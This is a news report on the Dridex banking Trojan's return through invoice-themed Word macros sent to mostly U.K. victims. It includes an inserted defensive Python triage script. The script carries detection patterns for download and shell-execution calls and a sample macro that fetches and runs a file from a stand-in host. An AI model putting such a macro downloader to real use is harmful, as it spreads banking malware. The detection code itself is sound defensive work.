Conspicuously off the grid for close to two months, the Dridex banking Trojan made some noise Thursday morning when a large phishing campaign, primarily targeting victims in the U.K., was corralled by researchers at Palo Alto Networks.
The phishing emails are laced with a Microsoft Word document that entices users to enable macros that call out to attacker-controlled websites and download the banking malware. The campaign is still active, Palo Alto intelligence director Ryan Olson said.
Dridex, meanwhile, had been pretty quiet after a raucous period of activity earlier this year in which different-themed phishing and spam campaigns used macros to download the malware from the Web. Macros, which are disabled by default in Office, are a decidedly old-school means of spreading malware that has made a definite resurgence in 2015, with Dridex leading the way.
“At the beginning of the year, we saw an uptick in Word docs using macros to install malware. We were super-surprised by this at the time because macro-based malware had all but disappeared since they were disabled by default in Office. We couldn’t figure it out,” Olson said. “I think it’s just a new generation of people who didn’t live through the pain of the late 1990s and early 2000s when it was a terrible thing that macros were enabled in Word or Excel. Today, they’re just clicking ‘Yes’ to enable macros.”
The phishing messages in this and other Dridex campaigns have been fairly convincing in getting users to comply. Generally, the emails mention some kind of business or retail order and ask for payment. The malicious attachments pretend to be an invoice, and the user is presented with a dialog box that asks them to enable macros in order to view the document.
In this case, the macros reach out to one of a handful of URLs to grab the malware. Palo Alto has published a list of the download URLs, command and control domains and other indicators of compromise.
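The delivery chain described above (a Word attachment whose macro fetches the payload from a URL) lends itself to a first-pass triage check at the mail gateway. The following is an added example of such a check, not code from the article or from Palo Alto Networks; the indicator patterns, the verdict policy and the in-memory sample documents are my own constructions.

```python
import io
import re
import zipfile

# Coarse indicator patterns for downloader macros (a constructed heuristic list, not from the report).
INDICATORS = {
    "auto-exec": rb"AutoOpen|Document_Open|Auto_Open",
    "url": rb"https?://",
    "download-api": rb"URLDownloadToFile|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest",
    "execute": rb"WScript\.Shell|\bShell\b|CreateObject",
}

def triage_office_attachment(data: bytes) -> dict:
    """Inspect an Office attachment: OOXML container? VBA project present? Any indicators inside it?"""
    result = {"is_ooxml": False, "has_vba": False, "indicators": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result  # legacy binary .doc (OLE2) or not an Office file at all; needs an OLE parser
    result["is_ooxml"] = True
    vba_parts = [n for n in zf.namelist() if n.lower().endswith("vbaproject.bin")]
    if not vba_parts:
        return result
    result["has_vba"] = True
    # Caveat: a real vbaProject.bin is an OLE2 file holding MS-OVBA-compressed source, so a raw byte
    # scan is only a first pass; decompress with a proper tool (e.g. olevba) for full coverage.
    blob = b"".join(zf.read(n) for n in vba_parts)
    result["indicators"] = [k for k, pat in INDICATORS.items() if re.search(pat, blob, re.IGNORECASE)]
    return result

def verdict(result: dict) -> str:
    """Gateway policy: block macro documents showing download/execute signs, hold the rest for review."""
    if not result["is_ooxml"]:
        return "review"
    if not result["has_vba"]:
        return "allow"
    return "quarantine" if result["indicators"] else "review"

def build_sample(with_macro: bool) -> bytes:
    """Constructed in-memory .docm/.docx; the macro blob is a plain-text stand-in, not a compiled project."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin",
                        b'Sub AutoOpen()\r\nURLDownloadToFile 0, "http://example.invalid/invoice.exe"\r\n'
                        b'Shell "invoice.exe"\r\nEnd Sub')
    return buf.getvalue()
```

A document with a VBA project but no indicators still goes to review, since the macro may simply be compressed beyond what a raw scan can see.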
Dridex, however, had all but dropped off the map since the end of the summer. One reason could be the arrest in early September in Cyprus of a 30-year-old Moldovan man allegedly behind the development and distribution of the malware.
Security blog Krebs on Security reported on the arrests on Sept. 7 and cited unnamed sources who said the man had ties to a cybercrime gang responsible for Dridex that may have been spun off from a notorious Eastern European gang called the Business Club accused of using malware to steal $100 million from banks worldwide.
“Between the end of August and now, we had seen no Dridex activity at all,” Olson said. “We attribute that to the arrest. We assumed there was some organizational shakeup and people were regrouping. It popped up again this morning with some volume.”
Unlike in early January when Dridex emails were peaking at close to 100,000 per day, Olson said today’s resurgence capped at around 20,000, mostly in the U.K.
“It’s been mostly U.K. all along,” Olson said. “It’s likely that their best opportunity for cashing out may be in the U.K. Either they have accounts or money mules there. The infrastructure is likely best set up for U.K.-based banks.”